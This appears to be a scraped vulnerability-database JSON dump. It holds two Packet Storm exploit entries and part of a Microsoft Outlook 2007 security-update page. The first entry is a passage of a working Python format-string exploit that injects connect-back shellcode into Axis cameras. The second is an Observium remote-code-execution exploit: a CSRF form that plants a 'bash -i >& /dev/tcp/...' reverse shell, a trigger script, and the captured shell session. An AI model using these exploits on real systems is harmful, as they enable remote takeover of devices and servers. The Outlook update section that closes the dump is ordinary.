'MIPSel': \n# Connect back PORT \nif len(port_hex) == 1: \nPP1 = \"%ff\" \nPP0 = '%{:02x}'.format((int(port_hex[0],16)-1)) \nelif len(port_hex) == 2: \n# Little Endian \nPP1 = '%{:02x}'.format((int(port_hex[0],16)-1)) \nPP0 = '%{:02x}'.format(int(port_hex[1],16)) \nelif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32 \n# Connect back PORT \nif len(port_hex) == 1: \nPP1 = \"%00\" \nPP0 = '%{:02x}'.format(int(port_hex[0],16)) \nelif len(port_hex) == 2: \n# Little Endian \nPP1 = '%{:02x}'.format(int(port_hex[0],16)) \nPP0 = '%{:02x}'.format(int(port_hex[1],16)) \nelif (target[Key][6]) == 'CRISv32': \n# Connect back PORT \nif len(port_hex) == 1: \nPP1 = \"%00\" \nPP0 = '%{:02x}'.format(int(port_hex[0],16)) \nelif len(port_hex) == 2: \n# Little Endian \nPP1 = '%{:02x}'.format(int(port_hex[0],16)) \nPP0 = '%{:02x}'.format(int(port_hex[1],16)) \nelse: \nprint \"[!] Unknown shellcode! (%s)\" % str(target[Key][6]) \nsys.exit(1) \n \n# Replace LHOST / LPORT in URL encoded shellcode \nshell = shellcode_db(rhost,verbose).sc(target[Key][6]) \nshell = shell.replace(\"IP1\",IP1) \nshell = shell.replace(\"IP2\",IP2) \nshell = shell.replace(\"IP3\",IP3) \nshell = shell.replace(\"IP4\",IP4) \nshell = shell.replace(\"PP0\",PP0) \nshell = shell.replace(\"PP1\",PP1) \nFMSdata += shell \n \n# \n# Calculate the FMS values to be used \n# \n# Get pre-defined values \nALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS \n# POP_SIZE = 8 \nPOP_SIZE = 1 \n \nGOThex = target[Key][0] \nBSShex = target[Key][1] \nGOTint = int(GOThex) \n \n# 'One-Write-Where-And-What' \nif not NCSH1 and not NCSH2: \n \nPOP1 = target[Key][2] \nPOP2 = target[Key][3] \n \n# Calculate for creating the FMS code \nALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) \nGOTint = (GOTint - ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE) \n \nBSSint = int(BSShex) \nBSSint = (BSSint - GOTint - ALREADY_WRITTEN) \n \n# if verbose: \n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated BSSint:\",BSSint \n \n# 'Two-Write-Where-And-What' using \"New Style\" \nelif NCSH2: \n \nPOP1 = target[Key][2] \nPOP2 = target[Key][3] \nPOP3 = target[Key][4] \nPOP4 = target[Key][5] \nPOP2_SIZE = 2 \n \n# We need to count higher than provided address for the jump \nBaseAddr = 0x10000 + BSShex \n \n# Calculate for creating the FMS code \nGOTint = (GOTint - ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + GOTint \n \n# Calculate FirstWhat value \nFirstWhat = BaseAddr - (ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat \n \n# Calculate SecondWhat value, so it always is 0x20300 \nSecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE) \n \nshell = shellcode_db(rhost,verbose).sc(target[Key][6]) \nshell = shell.replace(\"LHOST\",lhost) \nshell = shell.replace(\"LPORT\",lport) \n \nFirstWhat = FirstWhat - len(shell) \n \n# if verbose: \n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat \n \n \n# 'Two-Write-Where-And-What' using \"Old Style\" \nelif NCSH1: \n \nPOP1 = target[Key][2] \nPOP2 = target[Key][3] \nPOP3 = target[Key][4] \nPOP4 = target[Key][5] \nPOP2_SIZE = 2 \n \n# FirstWhat writes with 4 bytes (Y) (0x0002YYYY) \n# SecondWhat writes with 1 byte (Z) (0x00ZZYYYY) \nif BSShex > 0x10000: \nMSB = 1 \nelse: \nMSB = 0 \n \n# We need to count higher than provided address for the jump \nBaseAddr = 0x10000 + BSShex \n \n# Calculate for creating the FMS code \nALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) \n \nGOTint = (GOTint - ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE) \n \n# Calculate FirstWhat value \nFirstWhat = BaseAddr - (ALREADY_WRITTEN) \n \nALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE) \n \n# Calculate SecondWhat value, so it always is 0x203[00] or [01] \nSecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB \n \nshell = shellcode_db(rhost,verbose).sc(target[Key][6]) \nshell = shell.replace(\"LHOST\",lhost) \nshell = shell.replace(\"LPORT\",lport) \n \nGOTint = GOTint - len(shell) \n \n# if verbose: \n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat \n \nelse: \nprint \"[!] NCSH missing, exiting\" \nsys.exit(1) \n# \n# Let's start the exploiting procedure \n# \n \n# \n# Stage one \n# \nif NCSH1 or NCSH2: \n \n# \"New Style\" needs to make the exploit in two stages \nif NCSH2: \nFMScode = do_FMS(rhost,verbose) \n# Writing 'FirstWhere' and 'SecondWhere' \n# 1st request \nFMScode.AddADDR(GOTint) # Run up to free() GOT address \n# \n# 1st and 2nd \"Write-Where\" \nFMScode.AddDirectParameterN(POP1) # Write 1st Where \nFMScode.Add(\"XX\") # Jump up two bytes for next address \nFMScode.AddDirectParameterN(POP2) # Write 2nd Where \nFMSdata = FMScode.FMSbuild() \nelse: \nFMSdata = \"\" \n \nprint \"[>] StG_1: Preparing netcat connect back shell to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata)) \nelse: \nprint \"[>] StG_1: Sending and decoding shellcode to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata)) \n \n# Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM \n# Actually, any valid and public readable .shtml file will work... \n# (One of the two below seems always to be usable) \n# \n# For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two \n# For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url \n# \ntry: \ntarget_url = \"/httpDisabled.shtml?user_agent=\" \nif noexploit: \ntarget_url2 = target_url \nelse: \ntarget_url2 = \"/httpDisabled.shtml?&http_user=\" \n \nif NCSH2: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell \nelse: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) \nexcept urllib2.HTTPError as e: \nif e.code == 404: \nprint \"[<] Error\",e.code,e.reason \ntarget_url = \"/view/viewer_index.shtml?user_agent=\" \nif noexploit: \ntarget_url2 = target_url \nelse: \ntarget_url2 = \"/view/viewer_index.shtml?&http_user=\" \nprint \"[>] Using alternative target shtml\" \nif NCSH2: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell \nelse: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) \nexcept Exception as e: \nif not NCSH2: \nprint \"[!] Shellcode delivery failed:\",str(e) \nsys.exit(1) \n# \n# Stage two \n# \n \n# \n# Building and sending the FMS code to the target \n# \nprint \"[i] Building the FMS code...\" \n \nFMScode = do_FMS(rhost,verbose) \n \n# This is an 'One-Write-Where-And-What' for FMS \n# \n# Stack Example: \n# \n# Stack content | Stack address (ASLR) \n# \n# 0x0 | @0x7e818dbc -> [POP1's] \n# 0x0 | @0x7e818dc0 -> [free () GOT address] \n# 0x7e818dd0 | @0x7e818dc4>>>>>+ \"Write-Where\" (%n) \n# 0x76f41fb8 | @0x7e818dc8 | -> [POP2's] \n# 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address] \n# 0x76f55ab8 | @0x7e818dd0<<<<<+ \"Write-What\" (%n) \n# 0x1 | @0x7e818dd4 \n# \nif not NCSH1 and not NCSH2: \nFMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's \nFMScode.AddADDR(GOTint) # GOT Address \nFMScode.AddWRITEn(1) # 4 bytes Write-Where \n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) \n \nFMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's \nFMScode.AddADDR(BSSint) # BSS shellcode address \nFMScode.AddWRITEn(1) # 4 bytes Write-What \n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx) \n \n# End of 'One-Write-Where-And-What' \n \n \n# This is an 'Two-Write-Where-And-What' for FMS \n# \n# Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd=\"xxx\" --> \n# We jump over all SSI tagging to end up directly where \"xxx\" will \n# be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv()) \n# \n# The Trick here is to write lower target address, that we will jump to when calling free(), \n# than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT \n# address with two LSB writes. \n# \nelif NCSH2: \n# \n# Direct parameter access for FMS exploitation are really nice and easy to use. \n# However, we need to exploit in two stages with two requests. \n# (I was trying to avoid this \"Two-Stages\" so much as possibly in this exploit developement...) \n# \n# 1. Write \"Two-Write-Where\", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB) \n# 2. Write with \"Two-Write-What\", where 1st (LSB) and 2nd (MSB) \"Write-Where\" pointing to. \n# \n# With \"new style\", we can write with POPs independently as we don't depended of same criteria as in \"NCSH1\", \n# we can use any regular \"Stack-to-Stack\" pointer as we can freely choose the POP-and-Write. \n# [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.] \n# \n# Stack Example: \n# \n# Stack content | Stack address (ASLR) \n# \n# 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st \"Write-Where\" [@Stage One] \n# 0x76f41fb8 | @0x7e818dc8 | \n# 0x76f3d70c | @0x7e818dcc | \n# 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st \"Write-What\" [@Stage Two] \n# 0x1 | @0x7e818dd4 \n# [....] \n# 0x1c154 | @0x7e818e10 \n# 0x7e818e20 | @0x7e818e14>>>>>+ 2nd \"Write-Where\" [@Stage One] \n# 0x76f41fb8 | @0x7e818e18 | \n# 0x76f3d70c | @0x7e818e1c | \n# 0x76f55758 | @0x7e818e20<<<<<+ 2nd \"Write-What\" [@Stage Two] \n# 0x1 | @0x7e818e24 \n# \n \nFMScode.Add(shell) \n \n# \n# 1st and 2nd \"Write-Where\" already done in stage one \n# \n# 1st and 2nd \"Write-What\" \n# \nFMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. \nFMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB) \nFMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) \nFMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation \n \nelif NCSH1: \n# Could use direct argument addressing here, but I like to keep \"old style\" as well, \n# as it's another interesting concept. \n# \n# Two matching stack contents -> stack address in row w/o or max two POP's between, \n# is needed to write two bytes higher (MSB). \n# \n# \n# Stack Example: \n# \n# Stack Content | @Stack Address (ASLR) \n# \n# 0x9c | @7ef2fde8 -> [POP1's] \n# [....] \n# 0x1 | @7ef2fdec -> [GOTint address] \n#------ \n# 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB] \n# -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer) \n# 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB] \n# ------ | | \n# [....] -> [POP3's] | | \n# 0x7fb99dc | @7ef2fe7c | | \n# 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX] \n# 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX)) \n# -> [POP4's] | \n# (nil) | @7ef2fe88 | [Count up to 0x20300] \n# 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX) \n \nFMScode.Add(shell) \n \n# Write FirstWhere for 'FirstWhat' \nFMScode.AddPOP(POP1) \nFMScode.AddADDR(GOTint) # Run up to free() GOT address \nFMScode.AddWRITEn(1) \n \n# Write SecondWhere for 'SecondWhat' \n# \n# This is special POP with 1 byte, we can maximum POP 2! \n# \n# This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement \n# for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes. \n# Kept as reference as we now using direct parameter access AKA 'New Style\" for 5.2x/5.4x \n# \nif POP2 != 0: \n# We only want to write 'SecondWhat' two bytes higher at free() GOT \nif POP2 > 2: \nprint \"POP2 can't be greater than two!\" \nsys.exit(1) \nif POP2 == 1: \nFMScode.Add(\"%2c\") \nelse: \nFMScode.Add(\"%1c%1c\") \nelse: \nFMScode.Add(\"XX\") \nFMScode.AddWRITEn(1) \n \n# Write FirstWhat pointed by FirstWhere \nFMScode.AddPOP(POP3) # Old Style POP's \nFMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address. \nFMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB) \n \n# Write SecondWhat pointed by SecondWhere \nFMScode.AddPOP(POP4) # Old Style POP's \nFMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX) \nFMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation \n \nelse: \nsys.exit(1) \n \nFMSdata = FMScode.FMSbuild() \n \nprint \"[>] StG_2: Writing shellcode address to free() GOT address:\",'0x{:08x}'.format(GOThex),\"(%d bytes)\" % (len(FMSdata)) \n \n# FMS comes here, and calculations start after '=' in the url \ntry: \nif NCSH1 or NCSH2: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell \nelse: \nhtml = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode \nexcept urllib2.HTTPError as e: \nprint \"[!] Payload delivery failed:\",str(e) \nsys.exit(1) \nexcept Exception as e: \n# 1st string returned by HTTP mode, 2nd by HTTPS mode \nif str(e) == \"timed out\" or str(e) == \"('The read operation timed out',)\": \nprint \"[i] Timeout! Payload delivered sucessfully!\" \nelse: \nprint \"[!] Payload delivery failed:\",str(e) \nsys.exit(1) \n \nif noexploit: \nprint \"\\n[*] Not exploiting, no shell...\\n\" \nelse: \nprint \"\\n[*] All done, enjoy the shell...\\n\" \n \n# \n# [EOF] \n# \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/137941/axismpqtpacs-format.txt"}, {"lastseen": "2016-11-03T10:22:27", "description": "", "published": "2016-04-30T00:00:00", "type": "packetstorm", "title": "Observium 0.16.7533 Code Execution / Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-04-30T00:00:00", "id": "PACKETSTORM:136859", "href": "https://packetstormsecurity.com/files/136859/Observium-0.16.7533-Code-Execution-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit title: Observium Commercial - Authenticated RCE \n# Author: Dolev Farhi \n# Contact: dolevf at protonmail.com \n# Date: 28-04-2016 \n# Vendor homepage: http://observium.org/ \n# Software version: CE 0.16.7533 \n \nAuthenticated remote code execution \nUsing either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8 \nusing any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener \n \nroot@pt:~# nc -lvp 4444 \nlistening on [any] 4444 ... \n \nand a CSRF which looks like this: \n \n<!-- \n<html> \n<div align=\"center\"> \n<pre> \n \n<h2><b>CSRF<b></h2> \n<body> \n<form \naction=\"http://<observiumIP>/settings/section=paths/\" \nmethod=\"POST\"> \n<input type=\"hidden\" name=\"temp_dir\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_temp_dir\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_rrdtool\" value=\"\" /> \n<input type=\"hidden\" name=\"fping\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_fping\" value=\"\" /> \n<input type=\"hidden\" name=\"fping6\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_fping6\" value=\"\" /> \n<input type=\"hidden\" name=\"svn\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_svn\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpget\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpget\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpbulkget\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpbulkget\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpbulkwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpbulkwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"snmptranslate\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmptranslate\" value=\"\" /> \n<input type=\"hidden\" name=\"ipmitool\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_ipmitool\" value=\"\" /> \n<input type=\"hidden\" name=\"virsh\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_virsh\" value=\"\" /> \n<input type=\"hidden\" name=\"wmic\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_wmic\" value=\"\" /> \n<input type=\"hidden\" name=\"git\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_git\" value=\"\" /> \n<input type=\"hidden\" name=\"whois\" value=\"bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit\" /> \n<input type=\"hidden\" name=\"varset_whois\" value=\"\" /> \n<input type=\"hidden\" name=\"whois_custom\" value=\"1\" /> \n<input type=\"hidden\" name=\"file\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_file\" value=\"\" /> \n<input type=\"hidden\" name=\"dot\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_dot\" value=\"\" /> \n<input type=\"submit\" name=\"submit\" value=\"save\" /> \n</form> \n</body> \n</div> \n</html> \n \nor by changing the field of Path to 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit' and then visiting http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the \nwhois parameter which gives us a reverse shell on the machine: \n \nyou may also use the following python instead: \n \n\"\"\" \nimport sys \nimport urllib \nimport urllib2 \nimport cookielib \n \n#!/usr/bin/python \nusername = 'test' \npassword = '123456' \ntimeout = 10 \n \ntry: \ncj = cookielib.CookieJar() \nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) \nlogin_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''}) \nopener.open('http://observium-server', login_data, timeout=timeout) \nurl = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8' \nresp = opener.open(url) \n \nexcept Exception, e: \nprint e \nsys.exit(1) \n\"\"\" \n \nlistening on [any] 4444 ... \n192.168.2.155: inverse host lookup failed: Unknown host \nconnect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413 \nbash: no job control in this shell \nbash: /root/.bashrc: Permission denied \nbash-4.1$ ls -l /opt \nls -l /opt \ntotal 48944 \ndrwxrwxr-x 12 1000 1000 4096 Apr 27 13:47 observium \n-rw-r--r-- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz \ndrwxr-xr-x. 2 root root 4096 Mar 26 2015 rh \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/136859/observium0167533-execxsrf.txt"}], "mskb": [{"lastseen": "2021-01-01T22:44:42", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-0852", "CVE-2018-0850"], "description": "<html><body><p>Description of the security update for Outlook 2007: February 13, 2018.</p><h2>Summary</h2><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0850\" managed-link=\"\" target=\"\">Microsoft Common Vulnerabilities and Exposures CVE-2018-0850</a> and\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0852\" managed-link=\"\" target=\"\">CVE-2018-0852</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"https://support.microsoft.com/kb/949585\">Service Pack 3 for the 2007 Microsoft Office suite</a> installed on the computer.</p><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011200\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=734d6c5d-c1f5-4f58-a7c4-dcd8da6c33ac\" managed-link=\"\">Download the security update KB4011200 for the 32-bit version of Outlook 2007</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20180213\">security update deployment information: February 13, 2018</a>.</p><h3>Security update replacement information</h3><p>This security update replaces previously released security update <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4011213\" managed-link=\"\" target=\"\">KB 4011213</a>.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package name</th><th>Package hash SHA 1</th><th>Package hash SHA 2</th></tr><tr><td>outlookloc2007-kb4011200-fullfile-x86-glb.exe</td><td>8C90C9F0CF97FB052E50B011E875F05961930CDA</td><td>D3AF6A449218A166BAA392177FFBC84F5DFF02AF7AF365CDE75E3D1C85866164</td></tr></tbody></table><h3>File information</h3><p>The English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><h4>For all supported x86-based versions of Outlook 2007</h4><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Outlook-ar-sa.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-bg-bg.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-ca-es.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-cs-cz.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-da-dk.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-de-de.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-el-gr.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-en-us.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-es-es.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-et-ee.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-fi-fi.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-fr-fr.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-he-il.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-hi-in.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-hr-hr.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-hu-hu.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-it-it.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-ja-jp.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-kk-kz.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-ko-kr.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-lt-lt.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-lv-lv.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-nb-no.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-nl-nl.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-pl-pl.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-pt-br.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-pt-pt.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-ro-ro.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-ru-ru.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-sk-sk.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-sl-si.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-sr-cyrl-cs.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-sr-latn-cs.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-sv-se.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-th-th.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Outlook-tr-tr.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-uk-ua.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-x-none.xml</td><td>Not applicable</td><td>11,056</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-zh-cn.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-zh-hk.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:06</td><td>Not applicable</td></tr><tr><td>Outlook-zh-tw.xml</td><td>Not applicable</td><td>827</td><td>25-Jan-2018</td><td>19:07</td><td>Not applicable</td></tr><tr><td>Mapir.dll_1028</td><td>12.0.6665.5000</td><td>1,046,096</td><td>08-Aug-2012</td><td>05:04</td><td>Not 